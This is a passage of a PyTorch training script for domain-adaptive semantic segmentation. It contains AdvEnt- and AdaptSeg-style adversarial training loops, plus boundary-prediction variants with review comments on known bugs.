    interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
                         align_corners=True)
    trainloader_iter = enumerate(trainloader)
    targetloader_iter = enumerate(targetloader)  # created for symmetry; never advanced
    for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP + 1)):
        # reset optimizers
        optimizer.zero_grad()
        # adapt LR if needed
        adjust_learning_rate(optimizer, i_iter, cfg)
        # UDA Training
        # only train segnet. Don't accumulate grads in discriminators
        _, batch = trainloader_iter.__next__()
        images_source, labels, _, weather_name, _ = batch
        mid_feature_src, pred_src_main = model(images_source.cuda(device))
        ###########################
        # train on source for Seg #
        ###########################
        pred_src_main = interp(pred_src_main)
        loss_seg_src_main = loss_calc(pred_src_main, labels, device)
        loss = cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main
        loss.backward()
        optimizer.step()
        current_losses = {'loss_seg_src_main': loss_seg_src_main}
        print_losses(current_losses, i_iter)
        # Periodic checkpoint; the early-stop check only runs on snapshot
        # iterations, so training ends on the first snapshot at/after EARLY_STOP.
        if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
            print('taking snapshot ...')
            print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
            snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
            torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
            if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
                break
        sys.stdout.flush()
        # Visualize with tensorboard
        if viz_tensorboard:
            log_losses_tensorboard(writer, current_losses, i_iter)
            if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
                draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S')
# TODO: advent resnet
def train_advent(model, trainloader, targetloader, cfg):
    ''' UDA training with advent

    AdvEnt-style unsupervised domain adaptation (ResNet variant): the
    segmentation network is trained with the supervised loss on source data,
    while two fully-convolutional discriminators (aux / main output levels)
    are trained adversarially on the weighted self-information ("entropy")
    maps of the softmax predictions. The aux branch is only active when
    cfg.TRAIN.MULTI_LEVEL is set (d_aux is still constructed either way).

    Args:
        model: segmentation network; forward returns (aux_logits, main_logits).
        trainloader: source-domain loader yielding (images, labels, _, _) batches.
        targetloader: target-domain loader yielding (images, _, _, _) batches.
        cfg: experiment config; reads TRAIN.* hyper-parameters, GPU_ID and
            NUM_CLASSES.
    '''
    # Create the model and start the training.
    input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
    input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
    device = cfg.GPU_ID
    num_classes = cfg.NUM_CLASSES
    viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
    if viz_tensorboard:
        writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
    # SEGMENTATION NETWORK
    model.train()
    model.to(device)
    cudnn.benchmark = True
    cudnn.enabled = True
    # DISCRIMINATOR NETWORK
    # feature-level
    d_aux = get_fc_discriminator(num_classes=num_classes)
    d_aux.train()
    d_aux.to(device)
    # seg maps, i.e. output, level
    d_main = get_fc_discriminator(num_classes=num_classes)
    d_main.train()
    d_main.to(device)
    # OPTIMIZERS
    # segnet's optimizer
    optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
                          lr=cfg.TRAIN.LEARNING_RATE,
                          momentum=cfg.TRAIN.MOMENTUM,
                          weight_decay=cfg.TRAIN.WEIGHT_DECAY)
    # discriminators' optimizers
    optimizer_d_aux = optim.Adam(d_aux.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
                                 betas=(0.9, 0.99))
    optimizer_d_main = optim.Adam(d_main.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
                                  betas=(0.9, 0.99))
    # interpolate output segmaps to the (W, H) resolution of each domain
    interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
                         align_corners=True)
    interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
                                align_corners=True)
    # labels for adversarial training
    source_label = 0
    target_label = 1
    trainloader_iter = enumerate(trainloader)
    targetloader_iter = enumerate(targetloader)
    for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP + 1)):
        # reset optimizers
        optimizer.zero_grad()
        optimizer_d_aux.zero_grad()
        optimizer_d_main.zero_grad()
        # adapt LR if needed
        adjust_learning_rate(optimizer, i_iter, cfg)
        adjust_learning_rate_discriminator(optimizer_d_aux, i_iter, cfg)
        adjust_learning_rate_discriminator(optimizer_d_main, i_iter, cfg)
        # UDA Training
        # only train segnet. Don't accumulate grads in discriminators
        for param in d_aux.parameters():
            param.requires_grad = False
        for param in d_main.parameters():
            param.requires_grad = False
        # train on source
        _, batch = trainloader_iter.__next__()
        images_source, labels, _, _ = batch
        pred_src_aux, pred_src_main = model(images_source.cuda(device))
        if cfg.TRAIN.MULTI_LEVEL:
            pred_src_aux = interp(pred_src_aux)
            loss_seg_src_aux = loss_calc(pred_src_aux, labels, device)
        else:
            loss_seg_src_aux = 0
        pred_src_main = interp(pred_src_main)
        loss_seg_src_main = loss_calc(pred_src_main, labels, device)
        loss = (cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main
                + cfg.TRAIN.LAMBDA_SEG_AUX * loss_seg_src_aux)
        loss.backward()
        # adversarial training to fool the discriminator: target predictions
        # are pushed toward the *source* label.
        # NOTE(review): F.softmax is called without dim= throughout; PyTorch
        # falls back to a deprecated implicit dim — presumably dim=1 (class
        # channel) is intended; confirm before modernizing.
        _, batch = targetloader_iter.__next__()
        images, _, _, _ = batch
        pred_trg_aux, pred_trg_main = model(images.cuda(device))
        if cfg.TRAIN.MULTI_LEVEL:
            pred_trg_aux = interp_target(pred_trg_aux)
            d_out_aux = d_aux(prob_2_entropy(F.softmax(pred_trg_aux)))
            loss_adv_trg_aux = bce_loss(d_out_aux, source_label)
        else:
            loss_adv_trg_aux = 0
        pred_trg_main = interp_target(pred_trg_main)
        d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)))
        loss_adv_trg_main = bce_loss(d_out_main, source_label)
        loss = (cfg.TRAIN.LAMBDA_ADV_MAIN * loss_adv_trg_main
                + cfg.TRAIN.LAMBDA_ADV_AUX * loss_adv_trg_aux)
        loss = loss  # no-op self-assignment (kept as-is; likely leftover from refactoring)
        loss.backward()
        # Train discriminator networks
        # enable training mode on discriminator networks
        for param in d_aux.parameters():
            param.requires_grad = True
        for param in d_main.parameters():
            param.requires_grad = True
        # train with source (detached so gradients stop at the discriminator;
        # each half-batch loss is divided by 2 to average source/target).
        if cfg.TRAIN.MULTI_LEVEL:
            pred_src_aux = pred_src_aux.detach()
            d_out_aux = d_aux(prob_2_entropy(F.softmax(pred_src_aux)))
            loss_d_aux = bce_loss(d_out_aux, source_label)
            loss_d_aux = loss_d_aux / 2
            loss_d_aux.backward()
        pred_src_main = pred_src_main.detach()
        d_out_main = d_main(prob_2_entropy(F.softmax(pred_src_main)))
        loss_d_main = bce_loss(d_out_main, source_label)
        loss_d_main = loss_d_main / 2
        loss_d_main.backward()
        # train with target
        if cfg.TRAIN.MULTI_LEVEL:
            pred_trg_aux = pred_trg_aux.detach()
            d_out_aux = d_aux(prob_2_entropy(F.softmax(pred_trg_aux)))
            loss_d_aux = bce_loss(d_out_aux, target_label)
            loss_d_aux = loss_d_aux / 2
            loss_d_aux.backward()
        else:
            loss_d_aux = 0
        pred_trg_main = pred_trg_main.detach()
        d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)))
        loss_d_main = bce_loss(d_out_main, target_label)
        loss_d_main = loss_d_main / 2
        loss_d_main.backward()
        optimizer.step()
        if cfg.TRAIN.MULTI_LEVEL:
            optimizer_d_aux.step()
        optimizer_d_main.step()
        # NOTE: loss_d_aux / loss_d_main were overwritten by the target halves
        # above, so the reported values cover only the target-side D loss.
        current_losses = {'loss_seg_src_aux': loss_seg_src_aux,
                          'loss_seg_src_main': loss_seg_src_main,
                          'loss_adv_trg_aux': loss_adv_trg_aux,
                          'loss_adv_trg_main': loss_adv_trg_main,
                          'loss_d_aux': loss_d_aux,
                          'loss_d_main': loss_d_main}
        print_losses(current_losses, i_iter)
        # Periodic checkpoint; the early-stop check only runs on snapshot iterations.
        if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
            print('taking snapshot ...')
            print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
            snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
            torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
            torch.save(d_aux.state_dict(), snapshot_dir / f'model_{i_iter}_D_aux.pth')
            torch.save(d_main.state_dict(), snapshot_dir / f'model_{i_iter}_D_main.pth')
            if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
                break
        sys.stdout.flush()
        # Visualize with tensorboard
        if viz_tensorboard:
            log_losses_tensorboard(writer, current_losses, i_iter)
            if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
                draw_in_tensorboard(writer, images, i_iter, pred_trg_main, num_classes, 'T')
                draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S')
# TODO: advent + VGG backbone baseline
def train_advent_vgg(model, trainloader, targetloader, cfg):
    '''
    UDA training with advent

    Single-level adversarial UDA for a VGG-backbone segmentation network.
    Supports two modes selected by the config:
      * cfg.TRAIN.DA_METHOD == 'AdapSeg': the discriminator sees raw softmax
        maps (AdaptSegNet-style output-space alignment);
      * otherwise: the discriminator sees weighted self-information maps
        (AdvEnt-style entropy alignment).
    The GAN criterion is mse_loss when cfg.GAN == 'lsgan', else bce_loss.
    Only the main output level is aligned; the aux discriminator is commented out.

    Args:
        model: segmentation network; forward returns (mid_feature, main_logits).
        trainloader: source-domain loader yielding
            (images, labels, _, weather_name, _) batches.
        targetloader: target-domain loader yielding (images, _, _, _) batches.
        cfg: experiment config; reads TRAIN.*, GAN, GPU_ID and NUM_CLASSES.
    '''
    # Create the model and start the training.
    adaptseg_on = (cfg.TRAIN.DA_METHOD == 'AdapSeg')
    input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
    input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
    device = cfg.GPU_ID
    num_classes = cfg.NUM_CLASSES
    viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
    if viz_tensorboard:
        writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
    # SEGMENTATION NETWORK
    model.train()
    model.to(device)
    cudnn.benchmark = True
    cudnn.enabled = True
    # DISCRIMINATOR NETWORK
    # feature-level
    # d_aux = get_fc_discriminator(num_classes=512, ndf=128)
    # d_aux.train()
    # d_aux.to(device)
    # seg maps, i.e. output, level
    d_main = get_fc_discriminator(num_classes=num_classes)
    d_main.train()
    d_main.to(device)
    # OPTIMIZERS
    # segnet's optimizer
    optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
                          lr=cfg.TRAIN.LEARNING_RATE,
                          momentum=cfg.TRAIN.MOMENTUM,
                          weight_decay=cfg.TRAIN.WEIGHT_DECAY)
    # discriminators' optimizers
    # optimizer_d_aux = optim.Adam(d_aux.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
    #                              betas=(0.9, 0.99))
    optimizer_d_main = optim.Adam(d_main.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
                                  betas=(0.9, 0.99))
    # interpolate output segmaps to the (W, H) resolution of each domain
    interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
                         align_corners=True)
    interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
                                align_corners=True)
    # labels for adversarial training
    source_label = 0
    target_label = 1
    trainloader_iter = enumerate(trainloader)
    targetloader_iter = enumerate(targetloader)
    # LSGAN uses a least-squares criterion; vanilla GAN uses BCE.
    criterion_loss = mse_loss if cfg.GAN == 'lsgan' else bce_loss
    for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP + 1)):
        # reset optimizers
        optimizer.zero_grad()
        # optimizer_d_aux.zero_grad()
        optimizer_d_main.zero_grad()
        # adapt LR if needed
        adjust_learning_rate(optimizer, i_iter, cfg)
        # adjust_learning_rate_discriminator(optimizer_d_aux, i_iter, cfg)
        adjust_learning_rate_discriminator(optimizer_d_main, i_iter, cfg)
        # UDA Training
        # only train segnet. Don't accumulate grads in discriminators
        for param in d_main.parameters():
            param.requires_grad = False
        _, batch = trainloader_iter.__next__()
        images_source, labels, _, weather_name, _ = batch
        mid_feature_src, pred_src_main = model(images_source.cuda(device))
        ###########################
        # train on source for Seg #
        ###########################
        pred_src_main = interp(pred_src_main)
        loss_seg_src_main = loss_calc(pred_src_main, labels, device)
        loss = cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main
        loss.backward()
        ###################################
        # train on gan generator for Seg  #
        ###################################
        # Push target predictions toward the *source* label to fool d_main.
        # NOTE(review): F.softmax without dim= relies on the deprecated
        # implicit-dim fallback — presumably dim=1 is intended; confirm.
        _, batch = targetloader_iter.__next__()
        images, _, _, _ = batch
        mid_feature_tgt, pred_trg_main = model(images.cuda(device))
        pred_trg_main = interp_target(pred_trg_main)
        if adaptseg_on:
            d_out_main = d_main(F.softmax(pred_trg_main))
        else:
            d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)))
        loss_adv_trg_main = criterion_loss(d_out_main, source_label)
        loss = cfg.TRAIN.LAMBDA_ADV_MAIN * loss_adv_trg_main
        loss.backward()
        for param in d_main.parameters():
            param.requires_grad = True
        ##################################
        # train on gan discrimin for Seg #
        ##################################
        # Detach so discriminator gradients do not reach the segmentation net;
        # each half-batch loss is divided by 2 to average source/target.
        pred_src_main = pred_src_main.detach()
        if adaptseg_on:
            d_out_main = d_main(F.softmax(pred_src_main))
        else:
            d_out_main = d_main(prob_2_entropy(F.softmax(pred_src_main)))
        loss_d_main = criterion_loss(d_out_main, source_label)
        loss_d_main = loss_d_main / 2
        loss_d_main.backward()
        pred_trg_main = pred_trg_main.detach()
        if adaptseg_on:
            d_out_main = d_main(F.softmax(pred_trg_main))
        else:
            d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main)))
        loss_d_main = criterion_loss(d_out_main, target_label)
        loss_d_main = loss_d_main / 2
        loss_d_main.backward()
        optimizer.step()
        optimizer_d_main.step()
        # NOTE: loss_d_main was overwritten by the target half above, so the
        # reported value covers only the target-side discriminator loss.
        current_losses = {'loss_seg_src_main': loss_seg_src_main,
                          'loss_adv_trg_main': loss_adv_trg_main,
                          'loss_d_main': loss_d_main}
        print_losses(current_losses, i_iter)
        # Periodic checkpoint; the early-stop check only runs on snapshot iterations.
        if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
            print('taking snapshot ...')
            print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
            snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
            torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
            torch.save(d_main.state_dict(), snapshot_dir / f'model_{i_iter}_D_main.pth')
            if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
                break
        sys.stdout.flush()
        # Visualize with tensorboard
        if viz_tensorboard:
            log_losses_tensorboard(writer, current_losses, i_iter)
            if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
                draw_in_tensorboard(writer, images, i_iter, pred_trg_main, num_classes, 'T')
                draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S')
###########################################################################################
# TODO: Source Only for boundary VGG
def train_Boundary_vgg(model, trainloader, targetloader, cfg):
    """Source-only training of a VGG segmentation network with an auxiliary
    boundary-prediction head (no domain adaptation is performed).

    Args:
        model: network returning (mid_feature, seg_logits, boundary_logits).
        trainloader: source dataloader yielding
            (images, labels, _, weather_name, labels_things).
        targetloader: unused in this source-only variant; kept so the
            signature matches the other train_* entry points.
        cfg: experiment configuration (TRAIN.* hyper-parameters, GPU_ID, ...).
    """
    input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
    device = cfg.GPU_ID
    num_classes = cfg.NUM_CLASSES
    # Only log to tensorboard when the log directory already exists.
    viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
    if viz_tensorboard:
        writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
    # SEGMENTATION NETWORK
    model.train()
    model.to(device)
    cudnn.benchmark = True
    cudnn.enabled = True
    # segnet's optimizer
    optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
                          lr=cfg.TRAIN.LEARNING_RATE,
                          momentum=cfg.TRAIN.MOMENTUM,
                          weight_decay=cfg.TRAIN.WEIGHT_DECAY)
    # Upsample network outputs to the (W, H) source input size.
    interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
                         align_corners=True)
    trainloader_iter = enumerate(trainloader)
    for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP + 1)):
        # reset optimizer and adapt LR if needed
        optimizer.zero_grad()
        adjust_learning_rate(optimizer, i_iter, cfg)
        _, batch = next(trainloader_iter)
        images_source, labels, _, weather_name, labels_things = batch
        mid_feature_src, pred_src_main, pred_src_boundary = model(images_source.cuda(device))
        # --- supervised source losses ---
        # Boundary head. NOTE(review): supervised with `labels_things` here,
        # while the adversarial variants feed `labels` to boundary_loss_func —
        # confirm which supervision target is intended.
        pred_src_boundary = interp(pred_src_boundary)
        loss_boundary_src_main, boundary_targets = boundary_loss_func(
            pred_src_boundary, labels_things, cfg.TRAIN.BOUNDARY_LOSS, cfg.TRAIN.LAMBDA_DICE)
        # Segmentation head.
        pred_src_main = interp(pred_src_main)
        loss_seg_src_main = loss_calc(pred_src_main, labels, device)
        loss = (cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main +
                cfg.TRAIN.LAMBDA_BOUNDARY * loss_boundary_src_main)
        loss.backward()
        optimizer.step()
        current_losses = {'loss_seg_src_main': loss_seg_src_main}
        # Log the raw boundary loss under a key encoding loss type + weight,
        # e.g. 'loss_boundary_BCE+DICE_0.1' (same keys as the old if/elif chain).
        if cfg.TRAIN.BOUNDARY_LOSS not in ("BCE", "DICE", "BCE+DICE"):
            raise NotImplementedError(f"Not yet supported {cfg.TRAIN.BOUNDARY_LOSS}")
        current_losses['loss_boundary_{}_{}'.format(
            cfg.TRAIN.BOUNDARY_LOSS, cfg.TRAIN.LAMBDA_BOUNDARY)] = loss_boundary_src_main
        # Also log the weighted boundary loss that actually entered the total.
        current_losses['loss_boundary_src_main'] = cfg.TRAIN.LAMBDA_BOUNDARY * loss_boundary_src_main
        print_losses(current_losses, i_iter)
        if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
            print('taking snapshot ...')
            print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
            snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
            torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
            # Early stop is only evaluated on snapshot iterations (matches siblings).
            if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
                break
        sys.stdout.flush()
        # Visualize with tensorboard
        if viz_tensorboard:
            log_losses_tensorboard(writer, current_losses, i_iter)
            if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
                draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S', pred_src_boundary, boundary_targets)
# TODO: seg-only adaptation
def train_ad_Boundary_advent_vgg(model, trainloader, targetloader, cfg):
    """Adversarial UDA training (AdvEnt or AdaptSeg flavor) for a VGG
    segmentation network with an auxiliary boundary head; only the
    segmentation output is adapted (no boundary discriminator in this variant).

    Args:
        model: network returning (mid_feature, seg_logits, boundary_logits).
        trainloader: source dataloader yielding
            (images, labels, _, weather_name, labels_things).
        targetloader: target dataloader yielding (images, _, _, _).
        cfg: experiment configuration (TRAIN.* hyper-parameters, GPU_ID, ...).
    """
    # DA_METHOD selects the discriminator input: plain softmax (AdaptSeg)
    # vs. weighted self-information / entropy map (AdvEnt).
    adaptseg_on = (cfg.TRAIN.DA_METHOD == 'AdapSeg')
    input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
    input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
    device = cfg.GPU_ID
    num_classes = cfg.NUM_CLASSES
    viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
    if viz_tensorboard:
        writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
    # SEGMENTATION NETWORK
    model.train()
    model.to(device)
    cudnn.benchmark = True
    cudnn.enabled = True
    # Output-level discriminator.
    # BUGFIX: this variant feeds the discriminator F.softmax(pred), which has
    # `num_classes` channels — the (num_classes + 1)-channel build only matches
    # the [softmax | boundary] fusion used by train_cat_Boundary_advent_vgg.
    # Sibling train_Boundary_advent_vgg pairs the same plain-softmax input
    # with `num_classes`, so we do the same here.
    d_main = get_fc_discriminator(num_classes=num_classes)
    d_main.train()
    d_main.to(device)
    # OPTIMIZERS
    # segnet's optimizer
    optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
                          lr=cfg.TRAIN.LEARNING_RATE,
                          momentum=cfg.TRAIN.MOMENTUM,
                          weight_decay=cfg.TRAIN.WEIGHT_DECAY)
    # discriminator's optimizer
    optimizer_d_main = optim.Adam(d_main.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
                                  betas=(0.9, 0.99))
    # Upsample outputs to the (W, H) input size of each domain.
    interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
                         align_corners=True)
    interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
                                align_corners=True)
    # labels for adversarial training
    source_label = 0
    target_label = 1
    trainloader_iter = enumerate(trainloader)
    targetloader_iter = enumerate(targetloader)
    for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP + 1)):
        # reset optimizers and adapt LRs
        optimizer.zero_grad()
        optimizer_d_main.zero_grad()
        adjust_learning_rate(optimizer, i_iter, cfg)
        adjust_learning_rate_discriminator(optimizer_d_main, i_iter, cfg)
        # Generator step first: freeze the discriminator so no grads accumulate.
        for param in d_main.parameters():
            param.requires_grad = False
        _, batch = next(trainloader_iter)
        images_source, labels, _, weather_name, labels_things = batch
        mid_feature_src, pred_src_main, pred_src_boundary = model(images_source.cuda(device))
        # --- supervised source losses (boundary + segmentation) ---
        pred_src_boundary = interp(pred_src_boundary)
        # NOTE(review): boundary loss is driven by `labels` here, while
        # train_Boundary_vgg uses `labels_things` — confirm which is intended.
        loss_boundary_src_main, _ = boundary_loss_func(pred_src_boundary, labels, cfg.TRAIN.BOUNDARY_LOSS, cfg.TRAIN.LAMBDA_DICE)
        pred_src_main = interp(pred_src_main)
        loss_seg_src_main = loss_calc(pred_src_main, labels, device)
        loss = (cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main +
                cfg.TRAIN.LAMBDA_BOUNDARY * loss_boundary_src_main)
        loss.backward()
        # --- adversarial (generator) step on target: make d_main predict
        # `source_label` for target outputs ---
        _, batch = next(targetloader_iter)
        images, _, _, _ = batch
        mid_feature_tgt, pred_trg_main, pred_trg_boundary = model(images.cuda(device))
        pred_trg_main = interp_target(pred_trg_main)
        if adaptseg_on:
            d_out_main = d_main(F.softmax(pred_trg_main, dim=1))
        else:
            d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main, dim=1)))
        loss_adv_trg_main = mse_loss(d_out_main, source_label)  # LSGAN-style objective
        loss = cfg.TRAIN.LAMBDA_ADV_MAIN * loss_adv_trg_main
        loss.backward()
        # --- discriminator step ---
        for param in d_main.parameters():
            param.requires_grad = True
        # train with source (detach: no gradient back into the generator)
        pred_src_main = pred_src_main.detach()
        if adaptseg_on:
            d_out_main = d_main(F.softmax(pred_src_main, dim=1))
        else:
            d_out_main = d_main(prob_2_entropy(F.softmax(pred_src_main, dim=1)))
        loss_d_main = mse_loss(d_out_main, source_label) / 2
        loss_d_main.backward()
        # train with target
        pred_trg_main = pred_trg_main.detach()
        if adaptseg_on:
            d_out_main = d_main(F.softmax(pred_trg_main, dim=1))
        else:
            d_out_main = d_main(prob_2_entropy(F.softmax(pred_trg_main, dim=1)))
        loss_d_main = mse_loss(d_out_main, target_label) / 2
        loss_d_main.backward()
        optimizer.step()
        optimizer_d_main.step()
        current_losses = {
            'loss_seg_src_main': loss_seg_src_main,
            'loss_boundary_src_main': loss_boundary_src_main,
            'loss_adv_trg_main': loss_adv_trg_main,
            'loss_d_main': loss_d_main
        }
        print_losses(current_losses, i_iter)
        if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
            print('taking snapshot ...')
            print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
            snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
            torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
            torch.save(d_main.state_dict(), snapshot_dir / f'model_{i_iter}_D_main.pth')
            # Early stop is only evaluated on snapshot iterations (matches siblings).
            if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
                break
        sys.stdout.flush()
        # Visualize with tensorboard
        if viz_tensorboard:
            log_losses_tensorboard(writer, current_losses, i_iter)
            if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
                # NOTE(review): pred_trg_boundary is passed at network resolution
                # (never interpolated in this variant) — confirm draw_in_tensorboard
                # handles that.
                draw_in_tensorboard(writer, images, i_iter, pred_trg_main, num_classes, 'T', pred_trg_boundary)
                draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S', pred_src_boundary)
# TODO: b_advent + VGG backbone boundary
def train_cat_Boundary_advent_vgg(model, trainloader, targetloader, cfg):
    """Adversarial UDA training (AdvEnt or AdaptSeg flavor) where the
    discriminator input is the channel-wise concatenation of the softmaxed
    segmentation map and the 1-channel boundary map — hence the
    (num_classes + 1)-channel discriminator.

    Args:
        model: network returning (mid_feature, seg_logits, boundary_logits).
        trainloader: source dataloader yielding
            (images, labels, _, weather_name, labels_things).
        targetloader: target dataloader yielding (images, _, _, _).
        cfg: experiment configuration (TRAIN.* hyper-parameters, GPU_ID, ...).
    """
    # DA_METHOD selects the discriminator input: plain fusion (AdaptSeg)
    # vs. entropy map of the fusion (AdvEnt).
    adaptseg_on = (cfg.TRAIN.DA_METHOD == 'AdapSeg')
    input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
    input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
    device = cfg.GPU_ID
    num_classes = cfg.NUM_CLASSES
    viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
    if viz_tensorboard:
        writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
    # SEGMENTATION NETWORK
    model.train()
    model.to(device)
    cudnn.benchmark = True
    cudnn.enabled = True
    # Output-level discriminator over the [softmax seg | boundary] fusion,
    # so it takes num_classes + 1 input channels.
    d_main = get_fc_discriminator(num_classes=num_classes + 1)
    d_main.train()
    d_main.to(device)
    # OPTIMIZERS
    # segnet's optimizer
    optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
                          lr=cfg.TRAIN.LEARNING_RATE,
                          momentum=cfg.TRAIN.MOMENTUM,
                          weight_decay=cfg.TRAIN.WEIGHT_DECAY)
    # discriminator's optimizer
    optimizer_d_main = optim.Adam(d_main.parameters(), lr=cfg.TRAIN.LEARNING_RATE_D,
                                  betas=(0.9, 0.99))
    # Upsample outputs to the (W, H) input size of each domain.
    interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
                         align_corners=True)
    interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
                                align_corners=True)
    # labels for adversarial training
    source_label = 0
    target_label = 1
    trainloader_iter = enumerate(trainloader)
    targetloader_iter = enumerate(targetloader)
    for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP + 1)):
        # reset optimizers and adapt LRs
        optimizer.zero_grad()
        optimizer_d_main.zero_grad()
        adjust_learning_rate(optimizer, i_iter, cfg)
        adjust_learning_rate_discriminator(optimizer_d_main, i_iter, cfg)
        # Generator step first: freeze the discriminator so no grads accumulate.
        for param in d_main.parameters():
            param.requires_grad = False
        _, batch = next(trainloader_iter)
        images_source, labels, _, weather_name, labels_things = batch
        mid_feature_src, pred_src_main, pred_src_boundary = model(images_source.cuda(device))
        # --- supervised source losses (boundary + segmentation) ---
        pred_src_boundary = interp(pred_src_boundary)
        loss_boundary_src_main, _ = boundary_loss_func(pred_src_boundary, labels, cfg.TRAIN.BOUNDARY_LOSS, cfg.TRAIN.LAMBDA_DICE)
        pred_src_main = interp(pred_src_main)
        loss_seg_src_main = loss_calc(pred_src_main, labels, device)
        loss = (cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main +
                cfg.TRAIN.LAMBDA_BOUNDARY * loss_boundary_src_main)
        loss.backward()
        # --- adversarial (generator) step on target: make d_main predict
        # `source_label` for the target fusion ---
        _, batch = next(targetloader_iter)
        images, _, _, _ = batch
        mid_feature_tgt, pred_trg_main, pred_trg_boundary = model(images.cuda(device))
        pred_trg_main = interp_target(pred_trg_main)
        pred_trg_boundary = interp_target(pred_trg_boundary)
